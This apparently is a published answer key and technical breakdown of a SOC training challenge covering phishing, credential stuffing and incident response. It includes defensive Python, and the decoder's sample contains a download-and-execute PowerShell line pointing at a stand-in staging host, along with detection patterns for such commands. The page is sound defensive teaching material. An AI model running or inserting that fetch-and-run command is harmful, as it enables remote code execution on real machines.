Scotland Cyber Week SOC Challenge – Full Technical Breakdown
During CyberScotland Week 2026, we ran the SOC Investigation Challenge, an online investigation exercise designed to simulate the workflow of a Security Operations Centre (SOC) analyst responding to a developing cyber incident.
Participants progressed through three levels of increasing difficulty, starting with basic threat identification and progressing to full incident response. The challenge was set within a fictional organisation called Technical Solutions Limited, where participants investigated suspicious emails, abnormal login activity, and malware alerts.
Each stage reflected how real-world incidents often unfold in a SOC environment.
Level 1 - First Alert
The first stage introduced participants to the initial indicators of compromise, focusing on phishing and basic cyber security awareness.
Participants were presented with several emails and asked to identify which ones were malicious.
Q1 - Phishing Email Identification
Two of the emails in the challenge were phishing attempts designed to trick users into revealing their credentials.
Indicators of phishing included:
Suspicious sender domains
Links directing users to external login portals
Urgent requests for password resets
Domains designed to mimic legitimate services
Correct Answers
The phishing emails were:
Email A – Fake IT password reset request
Email C – Fake Microsoft security alert
Both messages attempted to convince the user to verify their account through suspicious links.
Example phishing emails used in the challenge encouraging users to reset or verify credentials.
Q2 - Password Awareness
Participants were also asked to identify the weakest password.
Correct Answer
Password123
This password is extremely weak because:
It appears in common password lists, so it is among the first guesses any attacker tries
It follows the predictable word-plus-digits pattern that cracking rules generate automatically
It falls to a dictionary attack almost instantly, with no need for brute force
Strong passwords should include:
A mix of characters
Random structure
High entropy
Q3 - Suspicious URL Identification
Participants were shown several URLs and asked which ones were suspicious.
The legitimate Microsoft login URL is https://login.microsoftonline.com. A URL that merely contains this name as a subdomain, as part of the path, or as a near-miss spelling is not the same host and should be treated as suspicious.
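As an added illustration covering both Q1 (suspicious sender and link domains) and Q3 (suspicious URLs), the Python below applies those checks programmatically; it is not part of the challenge materials. It accepts only the exact legitimate host over HTTPS and flags URLs that embed the real name as a subdomain or path component, reuse the brand under another domain, or are a near-miss spelling. The sample URLs are constructed for this example and are not the ones shown to participants.

```python
from urllib.parse import urlparse

# The allowlisted host is the one named on the page. The sample URLs below are
# constructed for this example; none of them is from the challenge itself.
LEGIT_LOGIN_HOSTS = {"login.microsoftonline.com"}
SAMPLE_URLS = [
    "https://login.microsoftonline.com/common/oauth2/authorize",
    "http://login.microsoftonline.com/reset",
    "https://login.microsoftonline.com.account-verify.example/login",
    "https://login-microsoftonline.com/",
    "https://login.micros0ftonline.com/",
    "https://example.org/login.microsoftonline.com/",
    "https://login.microsoftonlne.com/",
]

# Digit-for-letter swaps and hyphen-for-dot are the usual lookalike tricks.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "-": "."})


def levenshtein(a, b):
    """Edit distance between two strings (classic dynamic programme, one row at a time)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def url_verdict(url):
    """Return ("legit", reason) or ("suspicious", reason) for one URL."""
    p = urlparse(url)
    host = (p.hostname or "").lower().rstrip(".")
    if host in LEGIT_LOGIN_HOSTS:
        if p.scheme == "https":
            return "legit", "exact match on allowlisted host over https"
        return "suspicious", f"allowlisted host but scheme is {p.scheme!r}, not https"
    norm = host.translate(CONFUSABLES)
    for legit in LEGIT_LOGIN_HOSTS:
        brand = legit.split(".")[-2]  # "microsoftonline"
        if legit in host:
            return "suspicious", f"{legit!r} appears as a subdomain of {host!r}"
        if brand in norm:
            return "suspicious", f"brand {brand!r} reused under a different domain: {host!r}"
        if legit in p.path + p.query:
            return "suspicious", f"{legit!r} appears in the path, not the host"
        if levenshtein(norm, legit) <= 2:
            return "suspicious", f"{host!r} is a lookalike of {legit!r}"
    return "suspicious", f"{host!r} is not an allowlisted login host"


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        verdict, reason = url_verdict(u)
        print(f"{verdict:10} {u}\n           {reason}")
```

Only the first sample URL passes; every other one fails a different check, which is the point: an allowlist of exact hosts plus a handful of structural tests catches the subdomain, path, brand-reuse and typo tricks that a quick visual read of a link tends to miss.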
Level 2 - SOC Investigation
In the second tier, participants moved into SOC analyst territory, reviewing authentication logs after suspicious login activity was detected overnight.
Technical Solutions Limited detected multiple failed login attempts followed by a successful VPN login.
Participants were asked to analyse the evidence pack and answer several questions.
Q1 - What is the attacker IP address?
Correct Answer
185.92.220.14
Analysis of the logs showed repeated failed login attempts originating from this IP address followed by a successful authentication.
From a SOC perspective, this IP address would be flagged as a potential indicator of compromise (IOC).
Q2 - Which user account was compromised?
Correct Answer
j.smith
The logs showed that after several failed authentication attempts, the attacker successfully logged in using the j.smith account.
Indicators included:
Successful VPN login event
Authentication from a previously unseen IP address
Activity occurring outside typical working hours
Successful VPN Login Event
Q3 - What type of attack occurred?
Correct Answer
Credential stuffing
Credential stuffing occurs when attackers attempt to authenticate using username and password combinations obtained from previous data breaches.
Evidence supporting this classification included:
Authentication attempts across multiple accounts
Low attempt volume per account
Eventual success using a valid credential pair
The evidence showed login attempts spread across several accounts with only a few guesses each, which is what distinguishes credential stuffing from a brute-force attack, where a single account is hit with a long list of passwords.
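The classification above can be checked mechanically rather than by eye. The Python below is an added example and is not the challenge's evidence pack or tooling: it parses a constructed VPN authentication log (the attacker IP and the j.smith account are the page's; every other address, account name and the log format itself are assumptions made here), profiles each source address, separates credential stuffing (a few attempts against many accounts) from brute force (many attempts against one account), and flags any success that follows failures from the same source, noting whether it fell outside an assumed 08:00 to 18:00 UTC working day.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timezone

# Constructed sample log. 185.92.220.14 and j.smith come from the page; the
# other accounts, 203.0.113.9 (RFC 5737) and 10.20.30.40 are invented here.
SAMPLE_LOG = "\n".join(
    [
        "2026-02-24T02:11:03Z vpn-gw auth src=185.92.220.14 user=a.jones result=FAIL",
        "2026-02-24T02:11:09Z vpn-gw auth src=185.92.220.14 user=b.patel result=FAIL",
        "2026-02-24T02:11:15Z vpn-gw auth src=185.92.220.14 user=c.wong result=FAIL",
        "2026-02-24T02:11:22Z vpn-gw auth src=185.92.220.14 user=d.evans result=FAIL",
        "2026-02-24T02:11:30Z vpn-gw auth src=185.92.220.14 user=e.murray result=FAIL",
        "2026-02-24T02:11:37Z vpn-gw auth src=185.92.220.14 user=b.patel result=FAIL",
        "2026-02-24T02:11:44Z vpn-gw auth src=185.92.220.14 user=f.reid result=FAIL",
        "2026-02-24T02:11:51Z vpn-gw auth src=185.92.220.14 user=j.smith result=SUCCESS",
    ]
    # A second source hammering one account: the brute-force pattern for contrast.
    + [f"2026-02-24T03:40:{s:02d}Z vpn-gw auth src=203.0.113.9 user=admin result=FAIL"
       for s in range(0, 50, 5)]
    # The real user logging in from the office during working hours.
    + ["2026-02-24T09:02:41Z vpn-gw auth src=10.20.30.40 user=j.smith result=SUCCESS"]
)

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ auth src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>FAIL|SUCCESS)$"
)


def parse_log(text):
    """Turn matching lines into dicts with a timezone-aware timestamp; skip the rest."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(e)
    return events


def classify(n_fail, n_users, max_per_user, min_fail=5):
    """Brute force concentrates on one account; stuffing spreads few tries over many."""
    if n_fail < min_fail:
        return "normal"
    if n_users >= 5 and max_per_user <= 2:
        return "credential stuffing"
    if n_users <= 2 and max_per_user >= min_fail:
        return "brute force"
    return "suspicious (mixed pattern)"


def analyse(text, work_hours=(8, 18)):
    """Per-source profile: attack type plus any success that followed failures."""
    by_src = defaultdict(list)
    for e in parse_log(text):
        by_src[e["src"]].append(e)
    report = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "FAIL"]
        per_user = Counter(e["user"] for e in fails)
        first_fail = fails[0]["ts"] if fails else None
        compromised = [
            {"user": e["user"], "time": e["ts"].isoformat(),
             "out_of_hours": not (work_hours[0] <= e["ts"].hour < work_hours[1])}
            for e in evs
            if e["result"] == "SUCCESS" and first_fail is not None and e["ts"] > first_fail
        ]
        worst = max(per_user.values(), default=0)
        report[src] = {
            "failures": len(fails),
            "distinct_users": len(per_user),
            "max_per_user": worst,
            "attack": classify(len(fails), len(per_user), worst),
            "compromised": compromised,
        }
    return report


if __name__ == "__main__":
    for src, r in analyse(SAMPLE_LOG).items():
        print(src, r["attack"], f"fails={r['failures']} users={r['distinct_users']}", r["compromised"])
```

The thresholds are deliberately simple and are assumptions; in production they would be tuned to the gateway's normal failure rate. The important design point is that the two patterns are told apart by the ratio of distinct accounts to attempts per account, not by total volume, and that the 09:02 j.smith login from the internal address is not flagged because no failures preceded it from that source.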
Level 3 - Incident Response
The final stage simulated a live security incident following the compromised VPN access.
Participants were provided with endpoint detection alerts and logs indicating suspicious activity on an internal workstation.
Incident Overview
After gaining VPN access, the attacker began performing post-compromise activity on the compromised system.
The attack sequence included:
VPN access using compromised credentials
Download of a suspicious ISO file
Execution of encoded PowerShell commands
Outbound communication with an external host
Access to sensitive finance files
This sequence represents a common attacker workflow following initial access.
Q1 - Which stage of the cyber kill chain best describes this activity?
Correct Answer
Execution / Command & Control
The encoded PowerShell command represents malicious code execution on the endpoint. Strictly, "Execution" is the MITRE ATT&CK tactic name; in Lockheed Martin Cyber Kill Chain terms this activity spans the Exploitation and Installation stages, followed by Command & Control.
PowerShell is frequently abused by attackers because it is present on every Windows host, can run scripts directly from memory, and can drive the operating system and .NET without dropping a separate binary to disk. Encoding the command hides its contents from casual inspection of the process command line.
Following execution, the host also began communicating with an external server, indicating command and control activity.
PowerShell Execution Log
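As an added example (not the challenge's own log or tooling), the Python below shows what an analyst does with such an alert: pull the -EncodedCommand argument out of a process-creation record, decode it (PowerShell expects base64 of UTF-16LE text, so decoding it as UTF-8 yields garbage), and scan the result for download-and-execute indicators and for URLs that become candidate command-and-control or staging IOCs. The event line, the script body and its staging URL (an RFC 5737 documentation address) are constructed here; the hostname and account are the page's.

```python
import base64
import binascii
import re

# Constructed sample event (not from the challenge's evidence pack). WS-JSMITH-01
# and j.smith are the page's; the command line, the staging URL and the record
# format are assumptions made for this example.
PLAIN_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/stage2.ps1')"
# -EncodedCommand takes base64 of the UTF-16LE bytes of the script, not UTF-8.
ENCODED = base64.b64encode(PLAIN_CMD.encode("utf-16le")).decode("ascii")
SAMPLE_EVENT = (
    "2026-02-24T02:27:14Z WS-JSMITH-01 ProcessCreate user=j.smith "
    "image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    f'cmdline="powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED}"'
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...) and -ec,
# so a detection that only looks for the full flag name is trivially bypassed.
_PREFIXES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}, key=len, reverse=True)
ENC_FLAG_RE = re.compile(r"-(?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Strings that commonly signal download-and-execute behaviour or evasion.
INDICATORS = {
    "IEX": r"\bIEX\b|Invoke-Expression",
    "DownloadString": r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b",
    "Net.WebClient": r"Net\.WebClient",
    "FromBase64String": r"FromBase64String",
    "Hidden window": r"-w(?:indowstyle)?\s+hidden",
    "NoProfile": r"-nop(?:rofile)?\b",
}
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # malformed payload: still worth a look, but not decodable here


def find_indicators(text):
    """Names of the INDICATORS patterns present in text, case-insensitively."""
    return [name for name, pat in INDICATORS.items() if re.search(pat, text, re.IGNORECASE)]


def triage_event(event):
    """Decode the command line in a process-creation record and pull out IOCs."""
    m = re.search(r'cmdline="([^"]*)"', event)
    cmdline = m.group(1) if m else ""
    decoded = decode_encoded_command(cmdline)
    searchable = cmdline + "\n" + (decoded or "")
    return {
        "cmdline": cmdline,
        "decoded": decoded,
        "indicators": find_indicators(searchable),
        "urls": URL_RE.findall(decoded or ""),
    }


if __name__ == "__main__":
    result = triage_event(SAMPLE_EVENT)
    print("decoded:   ", result["decoded"])
    print("indicators:", ", ".join(result["indicators"]))
    print("urls:      ", result["urls"])
```

The extracted URL's host is the value to pivot on next: it should be searched for in proxy and firewall logs to confirm the outbound connection, and it is a candidate for the blocklist recommended under the next steps below. Indicators are matched against both the raw command line and the decoded script, since evasion flags such as the hidden window sit in the former and the download logic in the latter.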
Q2 - Which TWO actions should be taken immediately?
Correct Answers
Isolate the affected host
Reset the user’s credentials
These actions represent immediate containment steps during incident response.
Host Isolation
Isolating the compromised device prevents:
Further command and control communication
Additional attacker activity
Lateral movement across the network
Credential Reset
Resetting the compromised account's password prevents the attacker from re-authenticating to the VPN. Because a password change does not by itself tear down a session that is already established, any active VPN sessions and tokens for the account should be revoked at the same time.
Q3 - What Happened?
A strong response included the following sequence:
The attacker gained VPN access using compromised credentials belonging to j.smith
A malicious ISO file was downloaded
Encoded PowerShell commands were executed
The infected host established outbound connections to an external IP address
Sensitive finance files were accessed
This demonstrates an understanding of the full attack chain.
Q4 - Who Was Affected?
User Account: j.smith
Affected Device: WS-JSMITH-01
Organisation: Technical Solutions Limited
Identifying affected systems and users is critical for incident scoping.
Q5 - Recommended Next Steps
Participants were asked to recommend longer-term remediation actions.
Acceptable responses included:
Conducting a forensic investigation of the compromised host
Enforcing multi-factor authentication (MFA)
Blocking malicious IP addresses
Reviewing authentication logs across the organisation
Providing phishing awareness training
These actions help reduce the risk of similar attacks in the future.
Incident Timeline Summary
The simulated attack followed a realistic progression:
Phishing email leads to credential compromise
Credential stuffing used to access VPN
Malicious PowerShell execution
Command and control communication established
Sensitive finance data accessed
Attempted lateral movement
Key Learning Points
The challenge highlighted several important security principles:
The importance of recognising phishing attacks
Understanding the difference between brute force and credential stuffing
Identifying malicious PowerShell execution
Prioritising containment during incident response
Correlating logs across multiple systems
These are core skills used daily by Security Operations Centre analysts.
Final Thoughts
The SOC Challenge was designed to give participants practical exposure to the analytical thinking required in modern cyber security operations.
Rather than relying on isolated alerts, participants needed to analyse evidence, understand attacker behaviour, and respond appropriately.
We were extremely pleased with the engagement and the quality of responses submitted.
Thank you to everyone who took part in this year’s challenge and we look forward to running more cyber security exercises in the future.